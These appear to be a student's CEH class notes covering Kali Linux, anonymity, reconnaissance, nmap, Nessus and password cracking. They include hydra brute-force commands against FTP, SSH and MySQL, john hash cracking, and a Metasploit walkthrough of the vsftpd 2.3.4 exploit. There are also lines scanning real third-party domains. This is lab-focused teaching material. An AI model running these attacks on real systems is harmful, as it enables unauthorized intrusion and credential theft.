CEH

NWOGU OBINNA - CEH INSTRUCTOR javatpoint

SOFTWARE REQUIREMENTS
1. ORACLE VIRTUAL BOX - Enable Virtualization Technology Via
BIOS environment

to enable Virtualization Technology for HP systems:

- Shutdown your system
- power it up and immediately keep tapping the ESC key
and it will take you to BIOS environment
- it’ll bring some options, select F10
- write (search for Virtualisation Technology or VT-X and
enable it

2. KALI LINUX - is an operating system (just like windows), it’s

designed for ethical hackers, penetration testers, cyber security etc. All
the tools needed for hacking are already pre-installed on KALI LINUX

3. METASPOITABLE2 - is an environment where we’ll carry out our

lab section. It’s a machine that is designed to be vulnerable. It’s like
an environment we can practice our hacking from. It’s for learning how
to break into servers

4. BEEBOX/BWAPP (for web application) - it is a machine that is

designed for cyber security experts. It’s for learning how to break into
websites. Specifically for web application testing

SYSTEM REQUIREMENTS
1. RAM: at least 8gb ram above (On search bar, search for system
information, click on it, you’ll find the RAM there).

2. PROCESSOR: You need a processor of at least Core i3 and above

or GPU. From the system information, you can check the kind of
processor of your laptop

3. SPEED: the speed of a system depends on the RAM. It should be

at least 2.0GHZ or above (You can also check that from your system
information)

4. HDD (Hard disk): You should have a free space of at least 250GB
5. Your system should support Virtualisation technology

AN ALTERNATIVE IS:
- DUAL BOOTING
- LIVE BOOT FROM USB - (for this, you need tools like
RUFUS to make the USB drive bootable)

Monday 24/7/23

INTRODUCTION TO KALI

- File structure

- Directories & Sub directories in Kali

- The Terminal

Common commands to use in Kali

- sudo: it is used to run a program with the priviledge of the

admin.... it is simlar to 'run as an administrator' in windows (Admin
does not have any restriction or limited to any thing on the system)

- apt: to download

updating your repository (to install in kali - apt install)

Note: you must first update your repository before you can do
anything on kali.. without that, if you want to install anything it won't
go... We also need permission from the admin to update repository. the
command is - (sudo apt update)

Login in into the terminal as administrator(root): sudo -i (then input

your password). Note: the root user is the administrator on Kali.
Once you are on the root, you don't need sudo to get permission. you
can use exit command to leave the root directory

root (#); standard user ($)

- adduser: you used the add user command to create your own
user. the command is: sudo adduser [name of user] then its going
to ask you to create a password and you create it. Note: the new user
you created will not be among the sudoers list.

- usermod: this is used to add a user to add a user to the sudoers

list. (sudo usermod -aG sudo [name of user]).

- pwd: shows the current directory or folder that you are. pwd
means print working directory. home/[username] is the default
directory when you start up your terminal

- cd: this is used to change directory.

cd .. : this will take you one step down to the former directory

cd -- : this will take you back to the default directory

Note that the cd command is case sensitive.

- ls: this command list the content of a directory. we can also use ls
command to see hidden files and folders.

ls -a: to see hidden files, the command is (ls -a)

to create a hidden file manually:

right click, click on create folder, then you add (.) before the file
name... it will automatically hide the folder (to hide a file in linux, you'll
add a . at the beginning of the file name)

ls -l: this command is used to show more information about files

and folders in a particular directory.

ls -al: this command is combined. it shows the hidden files and

more information about the file

- mkdir: this is a command used to create directory

mkdir (folder1) (folder2) (folder3): this will create multiple

folders at the same time
 mkdir (.foldername): this command will create a hidden folder.
The (.) before the file name is the one that makes the folder hidden

- touch: this command is used to create a regular file

e.g .txt, .py, .lst, .rb

touch filename.txt - this will create a single file

touch greetings.py todo.lst items.txt account.rb - this will

create multiple file with different filetypes

- nano: nano is a cli text editor. this editor can only be used on the
terminal. it can be used to read a file and write into a file

nano greetings.py - this command will open the file with

greetings.py to enable us write into it or edit or read.

#!/usr/bin/python3 - shebang scripting language

print("Welcome to CEH Training with HiiT")

./[greetings.py] - this is a command to run the script/code on the

terminal. Note: this command will give you permission denied and if
you try sudo, it will give you command not found if the user is not
given the permission to execute.

- cat: this is a command used to read the content of a file. it works

for any regular file

cat [filename.extension]

- chmod: this command is used to give permission. permission can

be given to owner, group, others. These are the 3 entities you can give
permission to. the permission that can be given to them are read, write
and execute.

Permission in Kali:

(-rw-r--r--) --> -[rw-] [r--] [r--] : this means the first file is for
the owner, therefore the owner is given read and write permission, the
second part is group and the group is given only read permission and
the third part is others and the others is given only read permission.
 to give permission to owner is (sudo chmod u+x
(filename) ] -

[ sudo chmod u+x greetings.py ] - this command will grant the

user the permission to execute file the specified file (greetings.py).

[ sudo chmod u-x greetings.py ] - this will take away the

execute permission given to the owner

[ sudo chmod u=rwx greetings.py ] - this will give the read,

write, and execute permission to the user at the same time

[ sudo chmod g=rwx greetings.py ] - this will give the group

permission

/home/[user]/[filepath]/[filename] - to access any file from another

user

To add user to a group:

- create a new user and add it to the sudoer's list

- sudo groupadd [groupname] - this will create a new group ceh.

Note that this group must be created on the owners profile

- sudo usermod -aG [groupname] [newuser]

- sudo chgrp [groupname] greetings.py - this will change the

group ownership of greetings.py to ceh

- chown: this is used to change ownership of a file

sudo chown [newowner]:[group] filename

- cp: this command is used to copy a file from one directory to the
other. It duplicates the file i.e the original file will be there and it justs
copy it to another directory

cp [filename] [/absolute path to copy to] - this will copy the

file

cp [filename] [/absolute path/new.file.name] - this will copy

the file to the desktop and rename it with the new file name
 cp [file1 file2 file3] [/absolutepath] - this command is used to
copy more than one file at the same time

sudo cp [filename] [/absolute path to other user] - this is

used to copy file from one user to another

Note: the file might be locked i.e it will bring that the file
belong to root. the command to remove the restriction on the
file is;

sudo chmod a=rwx [/file path] ------ a stands for all

cp -r [foldername] [/folderpath] - this command is used to

copy folder to another path

cp -r [foldername] [/pathtocopyto/newfoldername] - this is

used to copy folder and rename it

cp -r [folder1 folder2 folder3] [/folderpath] - this is used to

copy multiple folders at the same time

cp -r * [/path to copied to] - this command is used to copy all

files (both files and folders) in the cd'ed folder to another path

- rm: this command is used to remove file or directory

rm [filename] - this removes the file from the direcotry

rm [file1] [file2] [file3] - this command is used to remove

multiple file at the same time

rm -r [foldername] - this command is used to remove folders

rm -r [folder1 folder2 folder3] - this command is used to

remove multiple folders at the same time

rm -r * - this will remove all files and folders in the directory

- mv: this is used to move file in kali. It is similar to the cut

command in windows

mv [filename] [/path to move to] - this will move the file to

new path
 mv [file1 file2 file3] [/path to move to] - this is to move
multiple path at the same time

mv [filename] [/pathtomoveto/newfilename] - this will move

the file and rename it

mv [foldername] [/pathtomoveto]- this command is used to

move folder

mv [folder1 folder2 folder3] [/pathtomoveto]- this will move

multiple folders at the same time

mv * [/pathtomoveto] - this will move all the file in the

directory to new path

- ifconfig - this is used to show network details on kali

eth0 - interface

mtu .. - data packets size

inet .. - ip address of the network

netmast -

broadcast - name address

inet6

ether: mac address its the address of the device

lo: is reserved for device

- netstat - this is used to tell you established connection. it shows

both local and remote connection

netstat -ano

local address: this is your current ip address

foreign address: this is the port address you're

connected to

- top: this command is used to see the processes that is running

and you can use it to end a process. it is similar to task manager
windows. it is a cli tool and it only runs on the terminal

PID: process identifier

user: this is the user running the process

to end a process: press k and it will ask you input the PID
number

- sudo bash: to login as root

- w: this is used to show the users that are logged in

whoami: will tell you the current user that is logged in

id: will give you more information about the user

- man: this command means manual. it is used to give information

about a command

man [command]

equally you can you use help;

[command] --help

Wednesday, 8th July, 2023

ANONYMITY IN KALI

Anonymity is like a shield.

to achieve anonymity, we use proxy server

Different between proxy and vpn:

proxy is like an ip protocol which is not owned by anyone, it can only

be connected for few hours and reconnect again, that way it makes it
hard to trace. one can only trace you on proxy by hacking you while
vpn is a connected to a private network owned by an individual.
HOW TO MASK OUR IP ADDRESS IN KALI

Tor uses Onion Routing to make connection (it connects to multiple

router before connecting to the main server). Nobody owns Tor, it's just
uses ip protocol.

to achieve that, we install tor;

Step1: start up your terminal

Step2: update your repository

Step3: use the command (sudo apt install tor) to install tor

Step4: start up tor using the command (tor)

now install the proxy extension

Step1: open up your firefox

Step2: go to add-ons and themes manager (you'll find it at the top

right corner), then extension

Step3: search for foxyproxy on the extension and click on foxyproxy

standard

Step4: click on it and click on add to firefox

Step5: search dnsleaktest.com on your browser to check your ip

address

Step6: go to the proxy tab and click on it, click options, then add

Step7: give the add a name (tor proxy), then choose SOCKSS5 under
proxy type

Step8: go to your terminal and copy the ip address, and port address

Step9: input it then click on save.

Step10: go to your proxy server and click on the new one you add

Step11: then go back to dnsleaktest.com and check your ip

address
Note: tor must be running and turn off your foxyproxy to be
able to browse on firefox

HOW TO MASK OUR MAC ADDRESS ON KALI

we'll be using MAC changer for mac address. press ctrl + C to stop tor
on the terminal

first check your mac address by typing command ifconfig on your

terminal

macchanger --help - to know more information about mac

changer

to change your mac address randomly

Step1: disconnect your internet

Step2: type in command (sudo macchanger -r eth0) to change in

your mac address randomly. Note: eth0 is the interface

Step3: type ifconfig to confirm if your mac address is changed

to use another's user mac address, we'll be using an online

platform (mac address generator);

Step1: go to your browser and search mac address generator

Step2: click on the first option

Step3: change the case to lower case then click on generate

Step4: copy the mac address then disconnect your internet

Step5: now go to your terminal and type in the command

sudo macchanger -m [copied ip address] [interface]

to change the mac address to your original mac address, type

in the command;
 sudo macchanger -p [interface]

duckduckgo.com - a search engine to browse anonymously

SNIFFING

- TCP flags: transmission control protocol - it is used to

tell/indicate state of connection.

flags are things that happen behind the scene

1. (SYN)/synchronization: this is used to initiate a connection.

the syn flag must be set before a communication can start

2. (ACK)/acknowledgment: this is used to acknowledge

whatever request that has been sent. this is like a receipt that tell you
the state of whatever you have sent on that record.

3. (FIN)/finish: when two computers are done exchanging data

on the internet, to end that conversation the fin packet must be set

4. (RST)/reset: this is used to reset a connection

5. (PSH)/push: if a system receive a push flag, it pause all other

process and attend to the push

6. (URG)/urgent: if a system receives a packet in an urgent

flag, it has to complete whatever it is doing before it attends to the
urgent packet

- 3way handshake: is a connection establishment process. if the

3way handshake is not complete, the site or connection will never be
established. the 3way handshake is SYN, SYN-ACK, ACK

- Sniffing: in ethical hacking, sniffing is defensive. sniffing is a

process of monitoring and capturing all data packets passing through a
given network. sniffing is all about monitoring networks. sniffing is
used by cyber criminals to steal info and personal informations. cyber
security professionals sniff their network in an effort to make it more
secured. we have 2 types of sniffing; the passive and active
 passive sniffing: these are somehow outdated or absolute. they
make use of hub. you can only monitor on the network, you can not
alter them.

acive sniffing: this is relative. you can both monitor and alter on
the active sniffing.

- wireshark: this is a tool you can use to carry out sniffing.

wireshark has a friendly interface (the gui is easy to understand and
well detailed compared to other sniffers). it is open source. it can be
used to monitor network, capture packets and analyze it. it is used to
analyze packet. wireshark does not alarm you or tell you you are
under attack. it captures packet in realtime.

practically:

how to start up wireshark:

wireshark can be start up in two ways either by terminal or search it in

your applicatio menu.

to start up wireshark through the terminal, open terminal and type in

the command (sudo wireshark)

to start sniffing:

go to terminal, check your interface by the command ifconfig

then go to wireshark and click on the interface you want to sniff on

TASK

visit a site(zero.webappsecurity.com) and go to wireshark to

capture the 3way handshake

to narrow wireshark down packet to a specific ip address,

open terminal and pinc the address (ping -c 4

zero.webappsecurity.com)

use the search filter (ip.addr==54.82.22.214) copy it and paste it in

the wireshark (if it shows green, then its correct. if it is red, its not
correct) or (http.request.method=="POST")
Wednesday 9/8/23

Information Gathering: it is an art of gathering information to

prepare an attack.

Reconnaisance in other words means information. this is the first

phace of hacking. this is where the attacker tries to know more than
the network more than the people who are running it.

There are 2 types of reconnaisance; passive and active

Passive reconnaisance: this is when you gather information through

a third party. it is where you gather information without attacking the
target directly.

Active reconnaisance: this is when you're attacking the target

directly in getting information. this attacks server to get information.
cybersecurity experts can see when you're trying to attack them
actively. it is good to use proxy when carrying out active
reconnaisance.

Footprinting: this means the tool will carry out information passively.
it is based on third party knowledge

Fingerprinting: this means the tool will carry out the attack actively.

Webserver: this contains the code you used to build a website. if an

attacker wants to hack you, the attacker will have to gather
information on the webserver to understand better

DNS server: dns is the phone book of the internet. it is your domain
name provider that have the server of the dns. the webserver depends
on the dns server.

Mailserver: this is used to deliver and receive emails. it can also be

referred as e-mail server. it deliver emails to client computers.

Subdomain: this is similar to sub-netting. attackers also look out for

subdomains. it is breaking down our domain into many domain.
subdomains are created to help organize and navigate to different
sections of your main website.

How to gather information on Subdomains, DNS, Mail and

Server

Tool to use

dnsenum: this tool gather all informations (webserver, subdomain,

mailserver, dns server) at once.

Steps:

- Startup your terminal

- type in the command (dnsenum [donainname]

under the host's address, you'll get two ip address for the
web server which means that either of them is a
secondary server or a load balancer i.e anytime you
connect to the website, it can connect to either of the ip
address. when an attacker attack one of the ip address, it
means there is still another ip address left.

the first time there (5) means TTL (time to leave) - it means
how many time does the packet have to be discarded

the IN is for the main server

the A (A rerod) is used to tell what type of ip address it uses.

an A record map a domain name to the ip address version 4. it
can also be AAAA record which means ip address version 6.

name servers, this shows the number of dns server the

domain name uses

Mail MX servers, this is for the main server, it shows the

mail server the domain name is connected to.
 Brute forcing, this is where the subdomains are. they are
similar to the main ip address. (CNAME means Carnonical
name)

Class, this is where you get the class of the ip address. most
network are already subnetted

the class of ip address is based on the number on the first part

Class A: 1-126, Class B: 128-191, Class C: 192-223

Whatweb: this gathers information from the website, it craws the

network to get information from the website or the webserver

whatweb [domainname]

after it loads, we are only interested where we got [200 OK]

which means that it is all is fine/sucessful. if you look carefully
and the site is showing the version of language is used to create
the websie, then it is not good for them coz hackers can
exploit that particular version. and finally it will show you the
package the website is built on like wordpress.

Email reconnaisance: this gives you the email address of the staffs
in that organization. we will be using the tool theHarvester to gather
those information.

- go to the terminal and type in the command

theHarvester -d [domainname] -l [no.of.limit] -b
[source]

-d is the domain name of the target

-l is the number of limit. the default is 500

-b is the source where the information will gather from

OSINT is used to carry out passive reconnaisance

Friday

How to configure API-Keys to theHarvester

/etc/theharvester/api-keys.yaml - confirm this from your file

system

after that, cd to the above path and sudo open the file [sudo api-
keys.yaml]

how to get API-key

we'll be trying shodan first

- visit shodan.io and create an account

- after verifying your account, go to your account settings, you'll see

your API key

- copy it and paste it under the shodan key then save.

- wafw00f: is a tool used to gather information about a firewall. it

will tell you if the target have a firewall or not. the command is;

sudo wafw00f [domain.name]

Types of Firewal

- the stateless firewall for windows applications. it blocks packets

- statefull

- web application firewall

- hybrid firewall

CLASSWORK
Carry out reconnaisance with the whatweb and wafw00f tool using
proxy

watw00f --proxy:SOCKS5://127.0.0.1:9050 [domain.name] - for

SOCKS5

watw00f --proxy:HTTP://127.0.0.1:8080 [domain.name] - for

HTTP proxy

whatweb --proxy=127.0.0.1:8080 [domain.name]

Note: that whatweb only recognize HTTP proxy so you have to use
Burpsuite but watw00f recognizes both HTTP proxy and SOCKS5
proxy

WE have a SOCKS proxy (TOR proxy) and HTTP proxy

for HTTP proxy, search for burpsuite (burpsuite is used to change

HTTP proxy) and open it. click on temporary project the next. then go
to proxy and click on intercept, check if its off then go to options then
you'll see the proxy IP address and port number. Copy it and use it in
your terminal.

Monday 14th August, 2023

reconftw is the best tool you can use for reconnaisance. it does all
watw00f and whatweb tool. reconftw doesn't come with kali so we
have to download it from github. to get the tool from kali is the
following;

(each time you want to download a tool from the github, you have to
scroll down and look for the installation setup and guide. that will give
you the guide to download and setup the tool)

- start up your browser and search for reconftw github

- look for the one from six2dez and click on it

- check on the instruction and see, you might have to install golang
first

to install golang

- go to golang.org and install golang for kali

- download golang for kali

- after its downloaded, go to your terminal and cd into your

download

- then login as root using sudo bash - this will login as root under
the downloads file

- then go to your installation guide and copy the codes there and
follow the process

now go back to your github installation guide and follow the steps
under it

- after the first step, go to the second step and copy the code under
it then run it line by line

after installation, to run the tool reconftw, you'll cd into the recon file
and type in the command ./reconftw.sh -d [domainname.com] -r

WEDNESDAY 16/08/23

Port Scanning and Enumeration

you'll learn how to perform portscanning using one of the most

advanced tool nmap

Port Address/Number is the service that your ip.address used to

communicate. is like your residential address i.e you tell someone that
HiiT is at Obafemi Awolowo. once an attacker scans a port, it can get
the kind of service the port is running on. There are 65535 ports on a
network. it can't go beyond that and all of these ports operate in the
transport layer of OSI model

192.168.0.21:80 when you scan a port and you saw a port 80, that
means the service is running on the web

Types of Ports

- well known ports: the port number ranging from 0 to 1023 and
examples are

Port Number Description TCP/UDP

0 Reserved TCP/UDP

21 FTP TCP

22 SSH (Secured Shell) TCP/UDP

23 telnet TCP/UDP

25 SMTP

53 DNS

80 HTTP

FTP (file transfer protocol) is for files, if you break into a FTP port
you can steal files

SSH (secured shell) is for encryption. it is used for remote access

and the remote access is secured. an attacker cannot read and
understand whatever it is even tho it manages to steal the file

telnet - you can do whatever you do on port 22 on port 23 also just

that it is not secured

SMTP (simple mail transfer protocol) - this means it can send and
receive emails

DNS (domain name system) - this connects

Registered Ports - it is similar to domain name because it has been

bought a specific organization and its only them that can access the
port. Any port ranging from 1024 - 49151 are known as registered
ports for vendors.

Ephemeral/Dynamic Ports - these are ports that your system needs.

this ports range from 49151 - 65535

Port Scanning and Enumeration - port scanning helps you audit

your networks. it is also used for vulnerability assessment. attackers
will want to carry out port scanning in order to attack your system.
while port scanning looks for open ports, enumeration used for
username, machinename, shared resources etc. you can't carry out
enumeration if you dont have access to the system.

Port Scanning with Nmap - Nmap is one of the best opensource tool
you can use for portscanning. Nmap is flexible aiside from port
scanning it can carry out other functions, it is powerful and easy to
use.

Types of Scan with Nmap

Syn stealth scan: this carry out scans without raising flags. it is
stealthy, it can not be noticed. the concept behind this scan is that, it
will send a syn flag to the target and the target will respond with syn-
ack but instead of nmap to send an ack flag, it will send a reset to
bypass the server. The syn steath scan does not complete the 3way
handshake

how to initiate nmap syn stealth scan:

- start up your terminal

- type in the command sudo nmap -sS [domain.name] ; -sS is

for syn stealth scan

by default, the syn stealth scan will only scan for well known ports so
to get nmap to scan from a range of port, you'll use the command
sudo nmap -p 21-65535 -sS [domainname] ; -p is for port range
Fragmented Scan - you carry out this scan when you don't get
results from the syn stealth scan. fragmented scan bypasses firewall
and. it splits the packet into hidden bits and it will get into the firewall.
firewall doesnt have the capability to defragment packets. you'll use
the command sudo nmap -f [domain.name] for fragmented scan.

Note that both syn stealth scan and fragmented scan will get you the
same result just that they use different approach.

Ping scan - ping scan is similar to ping you normally use. it send an
ICMP ECHO REQUEST and if the port is . it will show you the ip address
and mac address of a network. ping scan is used for auditing
networks. we'll be carrying out ping scan locally and remotely. if we
want to know how many people connected to our wifi, you can use
ping scan to know how many people connected - locally. to do it
remotely, it'll scan the number of connected devices on the network
and can instruct all the devices to attack the system

to do it remotely

- first switch your network to bridged on vm ware

bridge shares the same network with your windows i.e while NAT uses
another network. NAT (Network Address Translator) is used to translate
a private IP to a public IP

- check your ip address on kali with ifconfig

- to initiate the ping scan, type in the command sudo nmap -sP
[your.kali.IP.address] Note that you'll change the last octet to
1-255 as in 192.168.136.[1-255]

to scan for ipaddress of port in a target host, use the command sudo
nmap -sp [ipaddress.1-255]

Version Detection Scan - this nmap scan is not only going to tell us
the port number, its going to give us the version number and their
product name of the web servers too. to do this, we'll use the
command sudo nmap -sV [domainname]

OS Fingerprinting Scan - this type of scan will get you the operating
system the target is using.

to carry out the scan you, use -O as in nmap -O [target]

How to use ping to determine what operating system its using

when you carry out the scan, you'll determing the type of OS the
server is running on by the ttl

nmap scripting engine

nmap understand lua programming language. the path to script for

nmap are saved is /urs/share/nmap/script/

ASSIGNMENT

nmap -sC [domain.name] - this will carry out a scan on all the
scripting lang

using nmap:

- perform an idle scan - sudo nmap -Pn -sI

testphp.vulnweb.com hiitplc.

- perform zombie scan -

- perform a spoof IP source scan

- perform a vuln scan

- perform an XMAS scan

[email protected]

how to shut down open ports

- scan your ip address

if no port is open, you have to open a port sudo service [porttype]
start

to open a port, you use this command sudo service apache2 start;
this will open port 80. for port 21, you have to install vsftpd first. to
install that you use the command sudo apt install vsftpd then to
open it, you use the command sudo service vsftpd start

to stop port you'll use the command sudo service [porttype] stop

to close port 21, you use the command sudo service vsftpd stop
and likewise for port 80 to sudo service apache2 stop

Mitigation

- using firewall to redirect open ports to empty host

Vulnerability Assessment

Need for vulnerability assesment

- you can close unnecessary port with vulnerability assessment

- it helps you check for unknown devices connected to the network or

system

- third party application that are vulnerable to known exploits

- unnecessary services running on the device

Tools for vulnerability assessment

vulnerability assessment can be done on network and web server

for network security, we can use

- wireshark

- nmap

- metasploit
for web security,

- Nikto

- OWASP

vulnerability assessment can be done in 2 ways which are manually or

automated.

for automated:

- Nessus; one of the best tool. here we'll learn how to install nessus on
windows and kali.

for windows;

- start up your browser and search for nessus essentials download

(make sure you get it from their official site which is tenable).

nessus have free version and paid version

- register for an activation code on the default page

- it will take you to the download page, click on it and install it on your
windows

- after installation, it will take you to your browser where you'll click on
connect via SSL

- click on continue and make sure you tick register for nessus
essentials

- skip to the next step since you already have an activation code

- input your activation code and click on continue

- create a username and password you cannot forget because there is

no way to reset password if forgotten

- after that click on the next button and wait for it to download the
plugins

- incase it fails, open your command prompt as administrator

- after it opened, type in the command cd c://

- cd Tenable

- cd Nessus

- nessuscli.exe update

https://localhost:8834 127.0.0.1

nmap -Pn -p- -sI kiosk.adobe.com www.riaa.com

Monday, 21st August, 2023

Open nessus, to open nessus manually,

- go to your c drive and look for program files

- click on it, then go to tenable

- you'll see nessus, click on it

- then open the 3 files, nessusd, nessus-service, and open ssl

- go to your command prompt and check for your ip address, copy it

- then go to your browser and search https://[youripaddress]:8834

- this will start up your nessus manually

to carry out scan with nessus

- click on policies; this is like template

- click on 'create a new policy', there are many type of scan nessus
can carry out but we'll go with 'Advanced Scan'

- click on it and give it a name and type in your description

- after that, go to 'Discovery', check UDP and check on fragile devices

too

- next, go to 'Port Scanning', type in your port range but we'll use
default. the default is from 1-1024

- check verify and UDP then we go to Identity.

Note; if you're scanning a Windows OS, you'll check on 'Collect Data'

under General settings in Identity.

- under assessment, check on perform thorough tests

- next is the brute force, if the server is using Oracle Database, you
should check on Test on default accounts

- next is web web applications, ON scan web applications and check on

follow dynamically generated pages and check on 'Enable generic web
application tests', 'Try all HTTP methods', check on 'HTTP parameter
solution', check on 'Test embedded servers', check on 'test more than
one parameter at a time form' and check on 'test all combinations of
parameter (slowest)'

- check on do not stop after first flaw and check on 'look for all flaws'
also

- since we're scanning a linux machine, we'll leave windows and go to

malware, on 'scan for malware' under malware settings and check on
'linux directories'

- click on advanced, and check on 'Automatically accept detected SSH

disclaimer prompts', check on 'slow down the scan when network
congestion is detected', check on 'log scan details'.

basically, we have 2 types of scan, credential and non credential

The scan we are carrying out is non credential

- next, go to plugins, enable all plugins then finally 'SAVE'

How to initiate a scan

- click on my scan

- click on new scan, you'll see user defined at the top - click on it and
you'll see the policy you created.

the only thing we need to use for this scan is the ip address.

- go to kali and check for metasploitable2 ip address

- click on scheduled and make sure its not enabled since we are
scanning now

- save it and you'll see it on the page

- click on launch to begin the scan and you can also click on it to check
the progress

How to generate a report

you'll see report at the top, click on it and click on detailed vulnerabilities
by host and click on generate. then save the file

Wednesday, 23rd August, 2023

Credential Scan

To carry out a credential scan, create a new policy (its the same as the
step above) but when you reach Credentials, you'll select SSH and under
authentication method, you'll choose password, then create a username
and password then continue the step. Save when done and you can carry
out your scan........

credential scan usually take more time because nessus will be able to
login into the system to carry out the scan. credential scan will also give
you more result than the non credential

How to analyze result

the summary is the first one where it'll give you the scan information
about scan like that chart, start and stop time, and the host information.

the next one is the vulnerabilities, it start from the highest to the lowest
and it will tell you the name of the vulnerabily and the sypnosis will tell
you what the vulnerability is about. the description will tell you what an
attacker can do with the vulnerability. the next part is the solution where
it'll tell you what you can do to fix the vulnerability. the risk factor wi.

The CVSS Score tells you the impact of that vulnerability. The highest is
10. it means the damage will be high if an attacker is able to exploit the
vulnerability. The CVSS has 2 version which are CVSSv3.0

To breakdown the CVSS score

- start up your browser and search for CVSS 3.0 calculator

https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator

- Attack Vector can either be set to Network, Adjacent Network, Local

or Physical. eg. 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

so since AV is set to N it means network. the AC means Attack

Complexity which can be set to high or low. the PR means Privilege
Require which is set to None here (it can be set to none, low or high). the
UI means User Interaction. the next is Scope, it can either be unchanged
or changed. The C means Confidentiality impact, if it is set to none - it
means the attacker cannot see confidential information, if it is low, it
means partially and so on. the I means Integrity which means can the
content of some files changeable if the attacker exploit the vulnerability.
if it's set to high, it means the attacker can completely alter a file. the A
means Availability Impact which means if the system can be available to
users or not if the attacker is able to exploit the vulnerability.

you can over on it and it will give you more information about it.

PASSWORD HACKING

characteristics of a strong password

- the length shouldn't be less than 8 characters

- use a mix of uppercase, lowercase, numbers and special characters

- do not your use your first, middle or last name as password

types of attacks on password

- online: this is divided into passive and active

passive: this type of attack is carried on difficult passwords. the

following are types of passive attacks:

- Wiresniffing: this is also known as wireshark

- man in the middle attack: this is when an attacker is in the

middle of a session.

- replay attacks: this is like watching a video replay. an example is

session hijacking. it is similar to man in the middle attack

active:

- password guessing: an example is default logins

- bruteforce attack: this uses character set to create permetration.

- dictionary attack: this is when you have a list of words saved in a

file and you put this into a cracking tool and the cracking tool loops
through it until it gets to the right password if its in the file. it usually
uses a word list

- offline: an example is a rainbow table attack

C://windows/system32/config/SAM - this is where windows password

is saved

/etc/shadow - this is linux

rainbow table attack: this is like multiplication table. it has the

plaintext value for every hash (hashes are cryptographic value). it takes
longer time to get crack the same passwords and depends on the
complexity of the passwords. there are thousand hash algorithm.

Kali Hash uses SHA256 hash algorithm

windows uses LM hash algorithm

non-electronic:

- shoulder surfing: this is when attacker is looking over your

shoulder when you're

- keyboard sniffing

disadvantages of password attacks:

- account lockout can take place

- time consuming

- consume large amount of network bandwidth

Hashing is one way i.e if you want to make a doughnut, you'll have to
combine all the ingredients together to make the doughnut. now imagine
if you can extract the ingredients after you make the doughnut.

Encryption is 2 ways like sending an item to someone and bought a box,

you put those items in a box and lock it then send it. whoever you're
sending that item to need to have the key to open the box to get the
item.

tools for password attacks:

- hydra: this is used for online attacks.

- john the ripper: this is used for offline attacks

- crunch: this is a wordlist generator

- aircrack: this is used for wireless attacks

how to use John the Ripper:

- copy the password hash keys and paste it in a text editor and save it.

there is a tool called hash identifier to help you identify the type of hash
algorithm it's used to create a password hash

- go to your kali and go to password attacks

- under password attacks, click on offline attacks - there you'll see
hash identifier

- open your browser and search md5 encrypt

md5 is a hash you can use to encrypt your password into hash

- click on MD5 Hash Generator and type in a string and click on

generate

- copy the hash it generated and paste it on the hash identifier - it will
tell you the hash is MD5 hash in the possible hashes.

Kali hash is secured so if you copy a Kali hash and paste it in the hash
identifier, it will give you an error.

how to crack a password hash

- open your terminal and type in the command

sudo john --format=crpyt [/path to the saved password

hash/filename] - for kali hash algorithm

sudo john --format=RAW-md5 [/filepath] - for md5 hash algorithm

John has a lot of format you can use to crash passwords hash. you can
check it by sudo john --list=formats. We choose crypt because of the
hash algorithm we want to crack.

mimikatz, pwndump - this is a tool on windows

SERVER HACKING

- Start up metasploitable2 and carry out a port scan on it.

we're attacking port 21(ftp), 22(ssh), 3306(MySql) - we are focusing on

this port because, before you can use this port, it's going to ask for
username and password, so we are going to carry out _____ attack on
ports.
we'll see how to attack ports using two methods;

1.Bruteforce method - we'll be using the tool called hydra (hydra is an

online password cracker, you can use it to attack any service online).

Now we want to attack port 21,

- Open terminal and type in the command sudo hydra -L

[/wordlist.file path] -P [/wordlist.filepath] ftp://[target.ip]

-L is used to specify the path to our wordlist which is for

username

-P is used to specify path to our wordlish which is for password

you can find a wordlist on kali /usr/share/wordlists/ or you can

create a wordlist yourself

ftp client - this is a software you can use to connect to ftp server so
we'll be using the tool filezilla. to install filezilla,

- type in the command sudo apt install filezilla

- after installation, go to the dragon icon on kali and search filezilla

and open it

- it'll ask for host, username, password and port

for the host, you'll input your target ip address

for username, input the username you got from hydra

for password, input the password you got from hydra

and input the port number for the port

- after inputing the details, then click on quickconnect

- after you're logged in, steal a file from the

Now we want to attack port 22,

it's still the same step and the command will be sudo hydra -L
[/wordlist.file path] -P [/wordlist.filepath] -t 4 ssh://[target.ip]
any time you attack a ssh server, to connect to it, you'll use the
command ssh [username]@[target.ip] on the terminal and it will ask
for password.

after breaking into the server, steal the password hash and crack it.

vulnhub for machines to use for hacking

Wednesday, August 2023

Today, we are attacking port 3306(MySql)

- Start up your metasploitable2 and get the ip address

- sudo hydra -L [path-to-wordlist] -P [path-to-wordlist] -t 4

mysql://ipaddress

you will get an error on this, so go to your wordlish and make a space
on the first line and add root to your wordlist username and password.

after that run the command again.

- we'll be needing a client application to connect to the database so

we'll be using the tool dbeaver

- type in sudo apt install dbeaver to install dbeaver

- once installed, search for it on the application menu and open it

- after loading, click on MariaDB

- select host and and the IP address of the target (metasploitable2) on

the server host

- the username is there automatically which is root and we do not

need to input password since the database does not require password

- click on Test Connection to test it and it will download some driver

- if it bring out connected then the details it correct, if not, go back

and crosscheck
- after that, click on finish

- you'll see a drop down beside the ip address, click on it and double
click on the database and it will bring out the database

in this example, we'll go with the dvwa database

- double click on dvwa database and it will show you the tables
under it

- select on the user tables (the attacker will be interest in the user
since that is where usernames are stored)

- click on table data and it will show you the usernames and password
hash

- paste the target (metasploitable2) ip on the browser and click on the

dvwa and it will bring you to the login page

To get the password instead of craking it;

determine what type of hash the password it and generate a new one
yourself, then copy the hash of the password you generated and replace
it with the password hash of the target then save it. Now go back and
login with the your own password and viola - it logs in

2.Known Exploit

What Can You Do If The Password is Complicated and you still

cannot get the password?

- carry out a version detection scan on the target - this will show you
the product number and product version

we are going to use this to check if there is exploit for those product
version and the version number

we are going to use the tool metasploit framework

to start up metasploit framework

- type in msfconsole on the terminal

- use search command to search for exploit on the product name and
the version number as in search "vsftpd 2.3.4"

- you'll use this to select the exploit by use 0 (Note: 0 is the number
of the exploit)

- Now type in show options to show information about the exploit

you'll see some options set to No or Yes under required, the one's set to
No means they are not necesssary

RHOSTS - means the ip address of the target (metasploitable2)

RPORT - means the port number of the target

LHOSTS - means the ip address of your machine (Kali)

LPORT - means the port number of your machine

- Now, you'll set RHOSTS using the command set RHOSTS

[target.ip]

- set the RPORT to 21 also; set RPORT 21

- type in show options again to see the changes you made

- type in exploit and it will log you in

